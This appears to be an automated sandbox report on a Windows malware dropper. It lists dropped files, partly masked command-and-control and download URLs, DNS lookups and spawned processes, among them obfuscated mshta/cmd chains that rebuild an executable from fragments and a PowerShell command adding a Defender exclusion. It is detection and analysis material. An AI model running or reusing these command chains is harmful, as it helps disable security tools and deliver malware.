Technical Information
- <SYSTEM32>\tasks\firefox default browser agent 9f29dd4e4714a998
- '%WINDIR%\syswow64\taskkill.exe' -F -Im "Sun1324528697aa4.exe"
- <SYSTEM32>\svchost.exe
- %TEMP%\nsce179.tmp
- %TEMP%\is-9bnm7.tmp\sun13a143ed7209802.tmp
- %TEMP%\is-kju2r.tmp\_isetup\_setup64.tmp
- %TEMP%\is-kju2r.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-kju2r.tmp\idp.dll
- %TEMP%\skvpvs3t6y8w.exe
- %TEMP%\is-kju2r.tmp\etalevzajet.exe
- %TEMP%\sqlite.dat
- %TEMP%\sqlite.dll
- %TEMP%\ylrxm6o.qz
- %TEMP%\3uii17.ui
- %TEMP%\ezzs.mdf
- %TEMP%\uts09z.aiz
- %TEMP%\jnyesn.co
- %APPDATA%\wrtdwvc
- %TEMP%\yw7bb.dee
- %TEMP%\7zsc7a5dae5\sun13f4b840733c76ef.exe
- %TEMP%\fuej5.qm
- %TEMP%\7zsc7a5dae5\sun13c13ae1e3.exe
- %TEMP%\7zsc7a5dae5\sun13b1860c0df5055e.exe
- %TEMP%\setup_installer.exe
- %TEMP%\7zsc7a5dae5\libcurl.dll
- %TEMP%\7zsc7a5dae5\libcurlpp.dll
- %TEMP%\7zsc7a5dae5\libgcc_s_dw2-1.dll
- %TEMP%\7zsc7a5dae5\libstdc++-6.dll
- %TEMP%\7zsc7a5dae5\libwinpthread-1.dll
- %TEMP%\7zsc7a5dae5\setup_install.exe
- %TEMP%\7zsc7a5dae5\sun13215a62c60cae.exe
- %TEMP%\7zsc7a5dae5\sun1324528697aa4.exe
- %TEMP%\7zsc7a5dae5\sun13276ed57dfb2de5.exe
- %TEMP%\7zsc7a5dae5\sun1362f79061e8909fc.exe
- %TEMP%\7zsc7a5dae5\sun139692e84c939.exe
- %TEMP%\7zsc7a5dae5\sun13a143ed7209802.exe
- %TEMP%\7zsc7a5dae5\sun13ac0024b1.exe
- %TEMP%\7zsc7a5dae5\sun13ae556fed5.exe
- %TEMP%\7zsc7a5dae5\sun13b7886ca564.exe
- %TEMP%\{gkf2-iruxd-glcz-gjdp0}\52487506420.exe
- %APPDATA%\wrtdwvc
- %TEMP%\7zsc7a5dae5\libcurl.dll
- %TEMP%\7zsc7a5dae5\libcurlpp.dll
- %TEMP%\7zsc7a5dae5\libgcc_s_dw2-1.dll
- %TEMP%\7zsc7a5dae5\libstdc++-6.dll
- %TEMP%\7zsc7a5dae5\libwinpthread-1.dll
- %TEMP%\7zsc7a5dae5\setup_install.exe
- %TEMP%\7zsc7a5dae5\sun13215a62c60cae.exe
- %TEMP%\7zsc7a5dae5\sun13276ed57dfb2de5.exe
- %TEMP%\sqlite.dat
- 'localhost':49175
- 'to#.##gametoa.com':443
- 'microsoft.com':80
- 'co###ctini.net':443
- 'ap#.ip.sb':443
- 'st#####.##gitalcertvalidation.com':80
- 'cl#####-partners.ltd':80
- 'st#####mg.youtuuee.com':80
- 'ip##pi.com':80
- '19#.#45.227.161':80
- 'go####plusstore.com':80
- '65.##8.20.195':6774
- 'ma#.to':443
- 'sa###links.com':80
- 'li###ncode.com':443
- 'cd#.##scordapp.com':443
- 'cd#.##scordapp.com':80
- 't.###amec.com':443
- '37.#.8.119':80
- '45.##3.1.182':80
- 'hs##ns.xyz':80
- 'localhost':49177
- 'ip###ger.org':443
- 'di###a09.top':80
- http://hs##ns.xyz/addInstall.php?ke##############################################################################################################################################################...
- http://45.##3.1.182/proxies.txt
- http://37.#.8.119/base/api/statistics.php
- http://sa###links.com/Installer_Provider/UltraMediaBurner.exe
- http://19#.#45.227.161/dlc/sharing.php?pu########
- http://ip##pi.com/json/
- http://st#####.##gitalcertvalidation.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D
- http://st#####mg.youtuuee.com/api/fbtime
- http://cl#####-partners.ltd/stats/save.php?pu#################
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://di###a09.top/download.php?fi###########
- http://go####plusstore.com/upload/
- 'localhost':49175
- 'localhost':49177
- 'localhost':49178
- 't.###amec.com':443
- 'cd#.##scordapp.com':80
- 'cd#.##scordapp.com':443
- 'li###ncode.com':443
- 'ma#.to':443
- '65.##8.20.195':6774
- 'ap#.ip.sb':443
- 'co###ctini.net':443
- 'ip###ger.org':443
- DNS ASK hs##ns.xyz
- DNS ASK microsoft.com
- DNS ASK co###ctini.net
- DNS ASK ap#.ip.sb
- DNS ASK st#####.##gitalcertvalidation.com
- DNS ASK st#####mg.youtuuee.com
- DNS ASK to#.##gametoa.com
- DNS ASK kw##one.com
- DNS ASK ip###ger.org
- DNS ASK ch####utoparts.com
- DNS ASK be####orsale.com
- DNS ASK go####plusstore.com
- DNS ASK ma#.to
- DNS ASK sa###links.com
- DNS ASK li###ncode.com
- DNS ASK cd#.##scordapp.com
- DNS ASK cl#####-partners.ltd
- DNS ASK t.###amec.com
- DNS ASK ip##pi.com
- DNS ASK di###a09.top
- 'to#.##gametoa.com':53
- ClassName: 'ConsoleWindowClass' WindowName: ''
- ClassName: 'EDIT' WindowName: ''
- ClassName: '' WindowName: ''
- '%TEMP%\setup_installer.exe'
- '%TEMP%\7zsc7a5dae5\sun1362f79061e8909fc.exe'
- '%TEMP%\is-kju2r.tmp\etalevzajet.exe' /S /UID=burnerch2
- '%TEMP%\skvpvs3t6y8w.exe' /phmOv~geMVZhd~P51OGqJQYYUK
- '%TEMP%\is-9bnm7.tmp\sun13a143ed7209802.tmp' /SL5="$1100A4,506086,422400,%TEMP%\7zSC7A5DAE5\Sun13a143ed7209802.exe"
- '%TEMP%\7zsc7a5dae5\sun13ac0024b1.exe'
- '%TEMP%\7zsc7a5dae5\sun13c13ae1e3.exe'
- '%TEMP%\7zsc7a5dae5\sun13a143ed7209802.exe'
- '%TEMP%\7zsc7a5dae5\sun1324528697aa4.exe'
- '%TEMP%\{gkf2-iruxd-glcz-gjdp0}\52487506420.exe'
- '%TEMP%\7zsc7a5dae5\sun139692e84c939.exe'
- '%TEMP%\7zsc7a5dae5\sun13215a62c60cae.exe'
- '%TEMP%\7zsc7a5dae5\sun13b1860c0df5055e.exe' /mixone
- '%TEMP%\7zsc7a5dae5\sun13b7886ca564.exe'
- '%TEMP%\7zsc7a5dae5\sun13ae556fed5.exe'
- '%TEMP%\7zsc7a5dae5\setup_install.exe'
- '%TEMP%\7zsc7a5dae5\sun13276ed57dfb2de5.exe'
- '%TEMP%\7zsc7a5dae5\sun13f4b840733c76ef.exe'
- '%WINDIR%\syswow64\rundll32.exe' Shell32.dll,Control_RunDLL .\FUEj5.QM' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c start /I "" "%TEMP%\{GKf2-IrUxD-GLcz-GJdp0}\52487506420.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c copY /Y "%TEMP%\7zSC7A5DAE5\Sun1324528697aa4.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( ...' (with hidden window)
- '%TEMP%\is-kju2r.tmp\etalevzajet.exe' /S /UID=burnerch2' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c copY /Y "%TEMP%\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U ...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.Q...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c start /I "" "%TEMP%\{GKf2-IrUxD-GLcz-GJdp0}\15033057961.exe" /mix' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%LOCALAPPDATA%\Temp"
- '%WINDIR%\syswow64\cmd.exe' /c start /I "" "%TEMP%\{GKf2-IrUxD-GLcz-GJdp0}\52487506420.exe"
- '<SYSTEM32>\svchost.exe' -k SystemNetworkService
- '%WINDIR%\syswow64\rundll32.exe' Shell32.dll,Control_RunDLL .\FUEj5.QM
- '%WINDIR%\syswow64\control.exe' .\FUEj5.QM
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" eCHo "
- '<SYSTEM32>\rundll32.exe' "%TEMP%\sqlite.dll",global
- '%WINDIR%\syswow64\cmd.exe' /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.Q...
- '%WINDIR%\syswow64\mshta.exe' vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y...
- '%WINDIR%\syswow64\cmd.exe' /c copY /Y "%TEMP%\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U ...
- '%WINDIR%\syswow64\mshta.exe' vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("<SYSTEM32>\cmd.exe /c copY /Y ""%TEMP%\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && ...
- '%WINDIR%\syswow64\cmd.exe' /c copY /Y "%TEMP%\7zSC7A5DAE5\Sun1324528697aa4.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( ...
- '%WINDIR%\syswow64\cmd.exe' /c start /I "" "%TEMP%\{GKf2-IrUxD-GLcz-GJdp0}\15033057961.exe" /mix
- '%WINDIR%\syswow64\mshta.exe' vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("<SYSTEM32>\cmd.exe /c copY /Y ""%TEMP%\7zSC7A5DAE5\Sun1324528697aa4.exe"" SkVPVS3t6Y8...
- '%WINDIR%\syswow64\cmd.exe' /c Sun13f4b840733c76ef.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13ac0024b1.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13276ed57dfb2de5.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun1362f79061e8909fc.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13a143ed7209802.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13c13ae1e3.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13b1860c0df5055e.exe /mixone
- '%WINDIR%\syswow64\cmd.exe' /c Sun1324528697aa4.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13215a62c60cae.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun139692e84c939.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13b7886ca564.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13ae556fed5.exe
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%LOCALAPPDATA%\Temp"
- '<SYSTEM32>\rundll32.exe' Shell32.dll,Control_RunDLL .\FUEj5.QM